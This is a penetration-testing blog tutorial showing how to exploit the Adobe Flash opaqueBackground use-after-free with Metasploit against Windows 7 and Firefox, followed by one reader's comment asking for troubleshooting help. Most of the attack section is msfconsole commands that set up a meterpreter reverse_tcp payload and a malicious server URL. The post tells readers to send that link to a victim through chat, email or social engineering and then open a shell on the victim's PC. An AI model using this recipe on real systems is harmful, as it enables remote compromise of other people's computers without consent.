Categories

Archives

Kali Linux, Penetration Testing

Exploit Remote PC using Adobe Flash opaque Background Use After Free

This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This module is an early release tested on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194, windows 8.1, Firefox and Adobe Flash 18.0.0.203, Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and Windows 8.1, Firefox and Adobe Flash 18.0.0.194

Exploit Targets

Windows 7

Adobe Flash 18.0.0.194

Firefox 38.0.5

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/adobe_flash_opaque_background_uaf

msf exploit (adobe_flash_opaque_background_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_opaque_background_uaf)>set lhost 192.168.0.182 (IP of Local Host)

msf exploit (adobe_flash_opaque_background_uaf)>set srvhost 192.168.0.182

msf exploit (adobe_flash_opaque_background_uaf)>set uripath /

msf exploit (adobe_flash_opaque_background_uaf)>exploit

Now an URL you should give to your victim http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

 

2 thoughts on “Exploit Remote PC using Adobe Flash opaque Background Use After Free

  1. i have followed your tutorial with exact same version of flash player which is vulnerable. but the staging of the attack doesn’t come. it is stuck at “sending swf”, i have read some forums and used windows/exec payload and set CMD calc.exe just to see if it works, still that doesn’t work, i have turned my firewall off, deactivated the antivirus, made a fresh install of firefox and then i tried again, but still i amn’t able to solve it. please help me out! thanks in advance

Comments are closed.